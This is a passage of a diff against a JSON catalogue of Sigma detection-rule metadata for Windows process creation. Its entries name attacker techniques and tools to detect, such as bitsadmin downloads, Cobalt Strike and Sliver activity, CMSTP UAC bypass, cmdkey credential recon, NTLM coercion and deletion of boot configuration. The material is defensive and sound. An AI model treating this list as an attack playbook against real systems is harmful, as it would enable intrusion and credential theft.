"47688f1b-9f51-4656-b013-3cc49a166a36", - "value": "Base64 Encoded Listing of Shadowcopy" - }, - { - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "meta": { - "author": "Christian Burkard, pH-T", - "creation_date": "2022/03/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_base64_reflective_assembly_load.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027", - "attack.t1620" - ] - }, - "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "value": "Base64 Encoded Reflective Assembly Load" - }, - { - "description": "Detects usage of bitsadmin downloading a file", - "meta": { - "author": "Michael Haag, FPT.EagleEye", - "creation_date": "2017/03/09", - "falsepositive": [ - "Some legitimate apps use this, but limited." - ], - "filename": "proc_creation_win_bitsadmin_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "value": "Bitsadmin Download" - }, - { - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Some legitimate apps use this, but limited." - ], - "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "value": "Bitsadmin Download from Suspicious Domain" - }, - { - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "value": "Bitsadmin Download File with Suspicious Extension" - }, - { - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "99c840f2-2012-46fd-9141-c761987550ef", - "value": "Bitsadmin Download File from IP" - }, - { - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "value": "Bitsadmin Download to Suspicious Target Folder" - }, - { - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "value": "Bitsadmin Download to Uncommon Target Folder" - }, - { - "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_bootconf_mod.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "value": "Modification of Boot Configuration" - }, - { - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "meta": { - "author": "pH-T, Nasreddine Bencherchali (update)", - "creation_date": "2022/07/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_browser_remote_debugging.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1185" - ] - }, - "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "value": "Browser Started with Remote Debugging" - }, - { - "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", - "meta": { - "author": "Markus Neis, Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_bypass_squiblytwo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", - "https://twitter.com/mattifestation/status/986280382042595328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "value": "SquiblyTwo Execution" - }, - { - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "meta": { - "author": "Nasreddine Bencherchali, Florian Roth", - "creation_date": "2022/08/25", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_c2_sliver.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "42333b2c-b425-441c-b70e-99404a17170f", - "value": "Sliver C2 Implant Activity Pattern" - }, - { - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "meta": { - "author": "Alfie Champion (ajpc500)", - "creation_date": "2021/06/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_c3_load_by_rundll32.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "value": "F-Secure C3 Load by Rundll32" - }, - { - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", "meta": { "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/23", + "creation_date": "2021/11/05", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_certoc_execution.yml", + "filename": "proc_creation_win_susp_registration_via_cscript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://ss64.com/vb/cscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", - "value": "Suspicious Load DLL via CertOC.exe" - }, - { - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/issues/243", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "value": "NTLM Coercion Via Certutil.exe" - }, - { - "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Admin activity" - ], - "filename": "proc_creation_win_change_default_file_association.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.001" - ] - }, - "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "value": "Change Default File Association" - }, - { - "description": "Detects when a program changes the default file association of any extension to an executable", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_change_default_file_assoc_susp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.001" - ] - }, - "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "value": "Change Default File Association To Executable" - }, - { - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/13", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "filename": "proc_creation_win_chisel_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/jpillora/chisel/", - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ] - }, - "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "value": "Chisel Tunneling Tool Usage" - }, - { - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "meta": { - "author": "Aedan Russell, frack113 (sigma)", - "creation_date": "2022/06/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_chrome_load_extension.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/chromeloader/", - "https://emkc.org/s/RJjuLa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1176" - ] - }, - "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "value": "Powershell ChromeLoader Browser Hijacker" - }, - { - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "meta": { - "author": "Nasreddine Bencherchali @nas_bench", - "creation_date": "2021/12/18", - "falsepositive": [ - "Legitimate administrative use (Should be investigated either way)" - ], - "filename": "proc_creation_win_cleanwipe.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "value": "CleanWipe Usage" - }, - { - "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_clip.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", - "value": "Use of CLIP" - }, - { - "description": "Detects usage of cmdkey to look for cached credentials", - "meta": { - "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_cmdkey_recon.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.005" - ] - }, - "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "value": "Cmdkey Cached Credentials Recon" - }, - { - "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/15", - "falsepositive": [ - "Legitimate scripts" - ], - "filename": "proc_creation_win_cmd_delete.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "value": "Windows Cmd Delete File" - }, - { - "description": "Detects possible payload obfuscation via the commandline", - "meta": { - "author": "frack113", - "creation_date": "2022/02/15", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_cmd_dosfuscation.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "value": "Suspicious Dosfuscation Character in Commandline" - }, - { - "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_cmd_read_contents.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", - "value": "Read and Execute a File Via Cmd.exe" - }, - { - "description": "Use \">\" to redicrect information in commandline", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_cmd_redirect.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://ss64.com/nt/syntax-redirection.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", - "value": "Redirect Output in CommandLine" - }, - { - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Legitimate admin scripts" - ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", - "value": "Suspicious CMD Shell Redirect" - }, - { - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "meta": { - "author": "Nik Seetharaman, Christian Burkard", - "creation_date": "2019/07/31", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "filename": "proc_creation_win_cmstp_com_object_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://twitter.com/hFireF0X/status/897640081053364225", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ] - }, - "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "value": "CMSTP UAC Bypass via COM Object Access" - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "meta": { - "author": "Nik Seetharaman", - "creation_date": "2018/07/16", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ] - }, - "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "value": "CMSTP Execution Process Creation" - }, - { - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "meta": { - "author": "_pete_0, TheDFIRReport", - "creation_date": "2022/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "value": "Operator Bloopers Cobalt Strike Commands" - }, - { - "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", - "meta": { - "author": "_pete_0, TheDFIRReport", - "creation_date": "2022/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "value": "Operator Bloopers Cobalt Strike Modules" - }, - { - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "meta": { - "author": "Wojciech Lesicki", - "creation_date": "2021/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.cobaltstrike.com/help-windows-executable", - "https://redcanary.com/threat-detection-report/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "value": "CobaltStrike Load by Rundll32" - }, - { - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/27", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "f35c5d71-b489-4e22-a115-f003df287317", - "value": "CobaltStrike Process Patterns" - }, - { - "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", - "meta": { - "author": "xknow @xknow_infosec, Tim Shelton", - "creation_date": "2020/06/11", - "falsepositive": [ - "(not much) some benign Java tools may product false-positive commandlines for loading libraries" - ], - "filename": "proc_creation_win_commandline_path_traversal.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", - "https://twitter.com/Oddvarmoe/status/1270633613449723905", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", - "value": "Cmd.exe CommandLine Path Traversal" - }, - { - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/10/26", - "falsepositive": [ - "Google Drive", - "Citrix" - ], - "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/hexacorn/status/1448037865435320323", - "https://twitter.com/Gal_B1t/status/1062971006078345217", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "value": "Command Line Path Traversal Evasion" - }, - { - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - 